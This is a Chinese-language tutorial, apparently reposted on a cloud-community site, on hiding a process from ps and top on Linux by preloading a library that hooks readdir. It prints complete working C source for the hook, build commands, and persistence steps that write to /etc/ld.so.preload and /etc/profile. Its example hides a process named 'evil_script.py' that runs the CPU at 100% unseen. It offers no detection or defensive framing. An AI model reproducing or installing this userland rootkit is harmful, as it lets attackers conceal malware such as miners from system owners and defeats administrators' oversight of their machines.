linux 下隱藏進程的一種方法

來源:互聯網
上載者:User
前言
  1. 本文所用到的工具在 github.com/gianlucaborello/libprocesshider 可以下載
  2. 思路就是利用 LD_PRELOAD 來實現系統函數的劫持

    LD_PRELOAD是什麼:

    LD_PRELOAD是Linux系統的一個環境變數,它可以影響程式的運行時的連結(Runtime linker),它允許你定義在程式運行前優先載入的動態連結程式庫。這個功能主要就是用來有選擇性的載入不同動態連結程式庫中的相同函數。通過這個環境變數,我們可以在主程式和其動態連結程式庫的中間載入別的動態連結程式庫,甚至覆蓋正常的函數庫。一方面,我們可以以此功能來使用自己的或是更好的函數(無需別人的源碼),而另一方面,我們也可以以向別人的程式注入程式,從而達到特定的目的。

實現

1.下載程式編譯

bmfxgkpt-yhd:~# git clone github.com/gianlucaborello/libprocesshider.gitCloning into 'libprocesshider'...remote: Counting objects: 26, done.remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26Unpacking objects: 100% (26/26), done.bmfxgkpt-yhd:~# cd libprocesshider/bmfxgkpt-yhd:~/libprocesshider# makegcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldlbmfxgkpt-yhd:~/libprocesshider# 

2.移動檔案到/usr/local/lib/目錄下

mv libprocesshider.so /usr/local/lib/

3.把它載入到全域動態串連局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
測試
  1. 我們運行evil_script.py
  2. 此時發現在top 與 ps 中都無法找到 evil_script.py

此時我們發現 cpu 100%,但是卻找不到任何佔用cpu高的程式

分析
#define _GNU_SOURCE#include <stdio.h>#include <dlfcn.h>#include <dirent.h>#include <string.h>#include <unistd.h>/* * Every process with this name will be excluded */static const char* process_to_filter = "evil_script.py";/* * Get a directory name given a DIR* handle */static int get_dir_name(DIR* dirp, char* buf, size_t size){    int fd = dirfd(dirp);    if(fd == -1) {        return 0;    }    char tmp[64];    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);    ssize_t ret = readlink(tmp, buf, size);    if(ret == -1) {        return 0;    }    buf[ret] = 0;    return 1;}/* * Get a process name given its pid */static int get_process_name(char* pid, char* buf){    if(strspn(pid, "0123456789") != strlen(pid)) {        return 0;    }    char tmp[256];    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);     FILE* f = fopen(tmp, "r");    if(f == NULL) {        return 0;    }    if(fgets(tmp, sizeof(tmp), f) == NULL) {        fclose(f);        return 0;    }    fclose(f);    int unused;    sscanf(tmp, "%d (%[^)]s", &unused, buf);    return 1;}#define DECLARE_READDIR(dirent, readdir)                                \static struct dirent* (*original_##readdir)(DIR*) = NULL;               \                                                                        \struct dirent* readdir(DIR *dirp)                                       \{                                                                       \    if(original_##readdir == NULL) {                                    \        original_##readdir = dlsym(RTLD_NEXT, "readdir");               \        if(original_##readdir == NULL)                                  \        {                                                               \            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \        }                                                               \    }                                                                   \                                                                        \    struct dirent* dir;                                                 \                                                                        \    while(1)                                                            \    {                                                                   \        dir = original_##readdir(dirp);                                 \        if(dir) {                                                       \            char dir_name[256];                                         \            char process_name[256];                                     \            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \                strcmp(dir_name, "/proc") == 0 &&                       \                get_process_name(dir->d_name, process_name) &&          \                strcmp(process_name, process_to_filter) == 0) {         \                continue;                                               \            }                                                           \        }                                                               \        break;                                                          \    }                                                                   \    return dir;                                                         \}DECLARE_READDIR(dirent64, readdir64);DECLARE_READDIR(dirent, readdir);
  1. 程式定義了一個變數 process_to_filter 來控制不顯示哪個進程名
  2. 重寫readdir,
    strcmp(process_name, process_to_filter) == 0)
    當發現當前進程名稱與 process_to_filter 相同時,繼續迴圈.
遇到的坑
  1. 某些Linux中這個程式編譯通不過

    解決方案

    刪除最後兩行中的一行

    DECLARE_READDIR(dirent64, readdir64);

    DECLARE_READDIR(dirent, readdir);

  2. 某些Linux中使用
    echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

    並不會生效
    此時我們需要配置環境變數
    bmfxgkpt-yhd:~# vi /etc/profile
    增加一行
    export LD_PRELOAD=/usr/local/lib/libprocesshider.so

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.